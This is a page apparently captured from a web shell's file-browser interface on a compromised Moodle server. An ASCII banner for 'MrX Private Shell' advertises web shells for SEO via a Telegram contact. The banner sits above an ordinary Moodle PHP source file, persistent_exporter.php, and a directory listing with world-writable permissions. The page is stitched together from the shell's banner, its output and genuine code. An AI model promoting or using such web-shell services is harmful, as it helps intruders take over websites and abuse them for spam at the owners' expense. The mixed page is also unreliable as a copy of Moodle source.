__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <http://www.gnu.org/licenses/>.
/**
* Exporter based on persistent.
*
* @package core
* @copyright 2015 Damyon Wiese
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
namespace core\external;
use coding_exception;
/**
* Abstract exporter based on the persistent model.
*
* This automatically fills in the properties of the exporter from those of the persistent.
*
* @copyright 2015 Damyon Wiese
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
abstract class persistent_exporter extends exporter {
/** @var \core\persistent The persistent object we will export. */
protected $persistent = null;
/**
* Constructor - saves the persistent object, and the related objects.
*
* @param \core\persistent $persistent The persistent object to export.
* @param array $related - An optional list of pre-loaded objects related to this persistent.
*/
public function __construct(\core\persistent $persistent, $related = array()) {
$classname = static::define_class();
if (!$persistent instanceof $classname) {
throw new coding_exception('Invalid type for persistent. ' .
'Expected: ' . $classname . ' got: ' . get_class($persistent));
}
$this->persistent = $persistent;
if (method_exists($this->persistent, 'get_context') && !isset($this->related['context'])) {
$this->related['context'] = $this->persistent->get_context();
}
$data = $persistent->to_record();
parent::__construct($data, $related);
}
/**
* Persistent exporters get their standard properties from the persistent class.
*
* @return array Keys are the property names, and value their definition.
*/
final protected static function define_properties() {
$classname = static::define_class();
return $classname::properties_definition();
}
/**
* Returns the specific class the persistent should be an instance of.
*
* @return string
*/
protected static function define_class() {
throw new coding_exception('define_class() must be overidden.');
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| output | Folder | 0777 |
|
|
| coursecat_summary_exporter.php | File | 3.63 KB | 0777 |
|
| dynamic_tabs_get_content.php | File | 3.55 KB | 0777 |
|
| editmode.php | File | 2.67 KB | 0777 |
|
| exporter.php | File | 25.66 KB | 0777 |
|
| moodlenet_auth_check.php | File | 5.11 KB | 0777 |
|
| moodlenet_get_share_info_activity.php | File | 5.2 KB | 0777 |
|
| moodlenet_get_shared_course_info.php | File | 4.85 KB | 0777 |
|
| moodlenet_send_activity.php | File | 6.91 KB | 0777 |
|
| moodlenet_send_course.php | File | 8.46 KB | 0777 |
|
| paged_content_exporter.php | File | 4.23 KB | 0777 |
|
| persistent_exporter.php | File | 2.82 KB | 0777 |
|
| record_userfeedback_action.php | File | 2.91 KB | 0777 |
|